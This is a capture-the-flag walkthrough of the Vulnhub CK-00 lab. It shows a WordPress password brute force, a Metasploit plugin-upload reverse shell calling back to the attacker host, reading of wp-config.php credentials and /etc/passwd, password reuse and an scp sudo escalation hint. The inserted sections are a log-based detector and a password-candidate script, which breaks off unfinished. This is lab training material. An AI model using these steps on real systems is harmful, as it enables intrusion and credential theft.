Vulnhub CK-00 walkthrough

CK-00

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.66.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:ef:a8:59      1      60  PCS Systemtechnik GmbH
 192.168.56.156  08:00:27:6a:4e:4d      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.156.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-07 01:48 EST
Nmap scan report for bogon (192.168.56.156)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d2:6f:64:b5:4c:22:ce:b2:c9:8a:ab:57:0e:69:4a:0f (RSA)
|   256 a8:6f:9c:0e:d2:ee:f8:73:0a:0f:5f:57:1c:2f:59:3a (ECDSA)
|_  256 10:8c:55:d4:79:7f:63:0f:ff:ea:c8:fb:73:1e:21:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.2.2
|_http-title: CK~00 – Just another WordPress site
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:6A:4E:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.96 seconds

The target host has two open ports: 22 and 80.

Get Access

Since the target's SSH service version is fairly recent and offers no exploitable vulnerability, the next steps focus on the HTTP service:

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ gobuster dir -u http://192.168.56.156 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/07 01:51:52 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.156/wp-content/]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.156/wp-admin/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.156/wp-includes/]
/server-status        (Status: 403) [Size: 302]
Progress: 18376 / 56165 (32.72%)[ERROR] 2022/11/07 01:51:54 [!] parse "http://192.168.56.156/error\x1f_log": net/url: invalid control character in URL
Progress: 53961 / 56165 (96.08%)
===============================================================
2022/11/07 01:51:58 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ dirb http://192.168.56.156

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov  7 01:52:09 2022
URL_BASE: http://192.168.56.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.156/ ----
+ http://192.168.56.156/index.php (CODE:301|SIZE:0)
+ http://192.168.56.156/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.56.156/wp-admin/
==> DIRECTORY: http://192.168.56.156/wp-content/
==> DIRECTORY: http://192.168.56.156/wp-includes/
+ http://192.168.56.156/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.56.156/wp-admin/ ----
+ http://192.168.56.156/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-admin/css/
==> DIRECTORY: http://192.168.56.156/wp-admin/images/
==> DIRECTORY: http://192.168.56.156/wp-admin/includes/
+ http://192.168.56.156/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-admin/js/
==> DIRECTORY: http://192.168.56.156/wp-admin/maint/
==> DIRECTORY: http://192.168.56.156/wp-admin/network/
==> DIRECTORY: http://192.168.56.156/wp-admin/user/

---- Entering directory: http://192.168.56.156/wp-content/ ----
+ http://192.168.56.156/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.156/wp-content/plugins/
==> DIRECTORY: http://192.168.56.156/wp-content/themes/
==> DIRECTORY: http://192.168.56.156/wp-content/uploads/

---- Entering directory: http://192.168.56.156/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.156/wp-admin/network/ ----
+ http://192.168.56.156/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.156/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.156/wp-admin/user/ ----
+ http://192.168.56.156/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.156/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.56.156/wp-content/plugins/ ----
+ http://192.168.56.156/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.56.156/wp-content/themes/ ----
+ http://192.168.56.156/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.56.156/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Nov  7 01:52:19 2022
DOWNLOADED: 32284 - FOUND: 12

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ nikto -h http://192.168.56.156     
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.156
+ Target Hostname:    192.168.56.156
+ Target Port:        80
+ Start Time:         2022-11-07 01:52:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://ck/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2022-11-07 01:53:23 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ wpscan --url http://192.168.56.156 -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.156/ [192.168.56.156]
[+] Started: Mon Nov  7 01:54:24 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.156/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.156/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.156/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.156/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.156/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.156/, Match: 'WordPress 5.2.2'

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Nov  7 01:54:26 2022
[+] Requests Done: 48
[+] Cached Requests: 4
[+] Data Sent: 11.116 KB
[+] Data Received: 70.663 KB
[+] Memory used: 203.141 MB
[+] Elapsed time: 00:00:02

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ wpscan --url http://192.168.56.156 -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.156/ [192.168.56.156]
[+] Started: Mon Nov  7 01:55:19 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.156/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.156/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.156/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.156/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.56.156/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.56.156/, Match: 'WordPress 5.2.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin
Trying admin / alcala Time: 00:02:33 <                         > (19820 / 14364212)  0.13%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Nov  7 01:57:56 2022
[+] Requests Done: 19961
[+] Cached Requests: 29
[+] Data Sent: 6.52 MB
[+] Data Received: 84.244 MB
[+] Memory used: 200.723 MB
[+] Elapsed time: 00:02:37

So far, the username and password for the WordPress admin backend have been identified: admin / admin.

Visiting the WordPress backend, the page does not load; the browser's address bar shows the site redirecting to the hostname ck, so the /etc/hosts file needs an entry for it:

┌──(kali㉿kali)-[~/Vulnhub/Backrose]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.156  ck

Next, a PHP reverse shell script needs to be placed on the WordPress site. The first method: after logging in, edit the 404 template in the theme editor, replacing the 404 template's code with the PHP shell code.

But after clicking Update File, WordPress reports: Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

The second method is to upload the shell script through the Media section, but this fails as well, even after changing the extension to .php3, .php5 and so on.

Another approach is needed:

msf6 > use exploit/unix/webapp/wp_admin_shell_upload 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options 

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress


msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD admin
PASSWORD => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.156
RHOSTS => 192.168.56.156
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.137:5555 
[*] Authenticating with WordPress using admin:admin...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/awGuajvmFu/ShZJGEZTFJ.php...
[*] Sending stage (39927 bytes) to 192.168.56.156
[+] Deleted ShZJGEZTFJ.php
[+] Deleted awGuajvmFu.php
[+] Deleted ../awGuajvmFu
[*] Meterpreter session 1 opened (192.168.56.137:5555 -> 192.168.56.156:55956) at 2022-11-07 02:19:31 -0500

A Meterpreter shell is obtained successfully.
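Added defender-side example, not part of the original writeup: a check over the web server's access log that would have flagged both the wpscan password run and the Metasploit plugin upload shown above. The log lines are constructed to mirror this page; the Apache common-log prefix, the thresholds and the plugin allowlist are assumptions.

```python
"""Scan Apache access-log lines for the two traces the tooling above leaves behind:
a password-guessing run against wp-login.php and execution of a PHP file inside a
plugin directory that was never installed (what a plugin-upload shell looks like)."""
import re
from collections import defaultdict
from datetime import datetime

# Prefix shared by Apache's common and combined log formats (referer/UA ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A .php file requested directly inside /wp-content/plugins/<plugin>/...
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/(?P<plugin>[^/]+)/.*\.php(?:\?|$)')


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if no match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["status"] = int(ev["status"])
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def detect_login_bruteforce(events, threshold=20, window_seconds=300):
    """Flag source IPs that POST to wp-login.php at least `threshold` times inside any
    `window_seconds` span. WordPress re-renders the form with HTTP 200 on a wrong
    password and answers a correct one with a 302 to wp-admin, so the status code
    separates the failed guesses from a final success."""
    per_ip = defaultdict(list)
    for ev in events:
        if ev["method"] == "POST" and ev["path"].split("?")[0].endswith("/wp-login.php"):
            per_ip[ev["ip"]].append(ev)
    hits = {}
    for ip, evs in per_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):  # sliding window over the sorted timestamps
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[ip] = {
                    "failures": sum(1 for e in evs if e["status"] == 200),
                    "success": any(e["status"] == 302 for e in evs),
                }
                break
    return hits


def detect_unknown_plugin_php(events, known_plugins):
    """Return (ip, path, status) for every PHP request under a plugin directory that is
    not in the allowlist of plugins the site actually has installed."""
    findings = []
    for ev in events:
        m = PLUGIN_PHP_RE.match(ev["path"])
        if m and m.group("plugin") not in known_plugins:
            findings.append((ev["ip"], ev["path"], ev["status"]))
    return findings


def build_sample_log():
    """Constructed sample lines (not real logs), shaped after the scan in this writeup:
    25 wrong guesses, the admin/admin success, then the uploaded plugin being executed."""
    def line(ip, hh, mm, ss, method, path, status, size):
        return (f'{ip} - - [07/Nov/2022:{hh:02d}:{mm:02d}:{ss:02d} -0500] '
                f'"{method} {path} HTTP/1.1" {status} {size}')
    attacker, visitor = "192.168.56.137", "192.168.56.1"
    lines = [line(visitor, 1, 50, 10, "GET", "/index.php", 200, 12345),
             line(visitor, 1, 50, 12, "GET", "/wp-content/plugins/akismet/readme.txt", 200, 9876)]
    lines += [line(attacker, 1, 55, 20 + i, "POST", "/wp-login.php", 200, 4123) for i in range(25)]
    lines.append(line(attacker, 1, 57, 56, "POST", "/wp-login.php", 302, 0))
    lines.append(line(attacker, 2, 19, 31, "GET", "/wp-content/plugins/awGuajvmFu/ShZJGEZTFJ.php", 200, 0))
    return lines


if __name__ == "__main__":
    events = [ev for ev in map(parse_line, build_sample_log()) if ev]
    print(detect_login_bruteforce(events))
    for finding in detect_unknown_plugin_php(events, known_plugins={"akismet"}):
        print("unknown plugin PHP executed:", finding)
```

The plugin allowlist is the list of directories a site administrator knows to be installed; anything else answering with a 200 under /wp-content/plugins/ deserves a look even after the attacker's cleanup, since the module deletes the files but not the log entries.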

www-data@ck00:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ck_wp' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'bla_is_my_password' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'p#Q01YN<z$l{5^D&(haSU$vgD&b[p|)-Lur+Dg?~tatRgW>6gOVHVWx4w?oaucv.' );
define( 'SECURE_AUTH_KEY',  '<2GT}7Pq7VO_ck.B,/Le0kGQ@4^2FmV`ZX`AXLy%zoUXJE=:E^OT6Z$*ATfmR^+i' );
define( 'LOGGED_IN_KEY',    'tZF#d=KgHwwDH;xRiY)H;zT>weOD4;JgWF7KR)E,I_Sh#-B~Vbt!ax#<f@CSpykY' );
define( 'NONCE_KEY',        '8Odpqiy#/phCF6ezi?%gx0QEZWf ioBO,B}6h(TDkNBnrIjA`9.P6Jzn4+c<Z)D ' );
define( 'AUTH_SALT',        'kT0BrKy<fSR&[]HN]Pi{ +wa.@m~Xe)hGz2|LG#i*}v^upHn%B.^.swm q^rr%Bt' );
define( 'SECURE_AUTH_SALT', 'rV=Knc-+O}1Ee(v2T9P*{655sR-*aRW<NEc^lhd,IGBI<-0^=?cbq]#; |F||Ipi' );
define( 'LOGGED_IN_SALT',   '|,(6szua!E2iatwI)AvtOZ5KehK}2p@Z]F.i%~!l>wu)(8pw;FV@qC&$?q,nmf0z' );
define( 'NONCE_SALT',       'tqAZj9,df7;4?DKrB5+$=4bwiQBO?Fs_tGYmN`Fc y?,r}90rh/aB;tzaCWwv4vi' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );
www-data@ck00:/var/www/html$ 

www-data@ck00:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
ck-00:x:1000:1000:CyberKnight:/home/ck:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
bla1:x:1001:1001:Bla 1,01,0000,0001:/home/bla1:/bin/bash
bla:x:1002:1002:bla,0000,0000,0000:/home/bla:/bin/bash
www-data@ck00:/var/www/html$ su - bla
su - bla
Password: bla_is_my_password

bla@ck00:~$ id
id
uid=1002(bla) gid=1002(bla) groups=1002(bla)
bla@ck00:~$ sudo -l
sudo -l
[sudo] password for bla: bla_is_my_password

Matching Defaults entries for bla on ck00:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bla may run the following commands on ck00:
    (bla1) /usr/bin/scp
bla@ck00:~$ sudo -u bla1 /usr/bin/scp
sudo -u bla1 /usr/bin/scp
usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file]
           [-l limit] [-o ssh_option] [-P port] [-S program]
           [[user@]host1:]file1 ... [[user@]host2:]file2
bla@ck00:~$ 

The tail of wp-config.php gives the database credentials: user root, password bla_is_my_password. /etc/passwd shows that the target has a local user named bla (as well as bla1 and ck-00, all with /bin/bash as their shell), so the natural guess is that bla_is_my_password is also bla's login password, and `su - bla` confirms it.

`sudo -l` as bla shows that bla may run /usr/bin/scp as bla1 (password required). The usage text scp prints is itself a hint: `-S program` makes scp execute an arbitrary program as the target user, so the rule alone would be enough to get a shell as bla1. The write-up takes a shorter route instead.

Following the same naming pattern, the guess for bla1 is bla1_is_my_password. The first SSH attempt below is rejected; the second is accepted.
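The two guesses above come from one piece of reasoning: take the interactive accounts out of /etc/passwd and apply the naming pattern leaked by the database password. The script below is an added example, not part of the original write-up or the target, and generalizes that step: it filters a passwd dump to accounts with a real login shell and a uid at or above a threshold, then emits the `<user>_is_my_password` candidates. The passwd lines are constructed to mirror the ones the target printed.

```shell
# Added example (not from the original write-up): enumerate interactive
# accounts from an /etc/passwd dump and derive password candidates from the
# "<user>_is_my_password" pattern seen in wp-config.php.
# Constructed sample, copied in shape from the target's /etc/passwd.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
ck-00:x:1000:1000:CyberKnight:/home/ck:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
bla1:x:1001:1001:Bla 1,01,0000,0001:/home/bla1:/bin/bash
bla:x:1002:1002:bla,0000,0000,0000:/home/bla:/bin/bash'

# Print accounts that can actually log in: a shell that is not nologin/false
# and a uid >= the threshold (default 1000 = human users; pass 0 to include
# root and system accounts). Reads passwd text on stdin.
login_users() {
    min_uid="${1:-1000}"
    awk -F: -v min="$min_uid" '
        $3 >= min && $7 !~ /(nologin|false)$/ { print $1 }'
}

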